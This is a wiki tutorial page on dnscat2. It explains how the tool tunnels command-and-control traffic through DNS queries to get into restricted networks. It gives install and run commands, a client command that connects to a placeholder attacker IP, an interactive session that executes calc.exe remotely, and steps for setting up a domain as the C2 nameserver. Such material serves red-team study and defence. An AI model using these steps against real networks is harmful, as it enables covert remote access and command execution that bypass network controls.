Dnscat
From charlesreid1
Contents
Overview
What is it?
dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. It works by running a dnscat2 server and a dnscat2 client, and having the two ends communicate via DNS queries.
There are two ways of running dnscat2:
- In "direct DNS" mode, the client can communicate with the attacker directly as if the attacker were a standard DNS server. This is the simplest setup, but in a more secure network, machines may be restricted to only run DNS queries using explicitly allow-listed DNS servers.
- In "proxy DNS" mode, the client and server can still communicate, but the DNS queries are proxied by another DNS server. This method requires a public DNS entry that points to the dnscat2 server. The client can then send and receive DNS queries to and from the dnscat2 server by using that public domain, and having the DNS queries handled by an intermediary DNS server.
Installing
# apt-get update # apt-get -y install ruby-dev git make g++ # gem install bundler # git clone https://github.com/iagox86/dnscat2.git # cd dnscat2/server # bundle install
Usage
Direct DNS Mode
Running the server
When you run the server, no arguments are required
# ruby ./dnscat2.rb Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]... No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side:
# ruby ./dnscat2.rb Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]... No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client) dnscat2> New session established: 12199 dnscat2>
Now, you can connect to the particular interactive session with that number:
dnscat2> session -i 12199 Welcome to a command session! Use 'help' for a list of commands or ^z for the main menu dnscat [command: 12199]> exec calc.exe Sent request to execute dnscat [command: 12199]>
Running the client
On Linux:
./dnscat2.rb --host 101.202.303.404
On Windows:
C:\Users\asdf\Desktop> dnscat2-win32.exe --host 101.202.303.404
Proxy DNS Mode
DNS Setup
The C2 server should be a registered domain, and should be an authoritative DNS server, and the authoritative DNS server should be the same server running the dnscat2 server.
Here's how to set that up:
- Suppose you are using example.com as the domain
- Add two new A records that will be the nameserver subdomains, and will both point to the dnscat2 server IP address:
ns1.example.comns2.example.com
- Now you should inform the domain registrar that the authoritative DNS server for this domain is the dnscat2 server
- Set up the domain to use your own, custom nameservers
- Add the nameservers ns1.example.com and ns2.example.com
Give some time for settings to take effect.
Now when you run dnscat2 on the server, you specify example.com domain (instead of no argument), and on the server, you specify example.com domain (for --host flag, instead of host IP).
Resources
https://zeltser.com/c2-dns-tunneling/
Github: https://github.com/iagox86/dnscat2
Flags
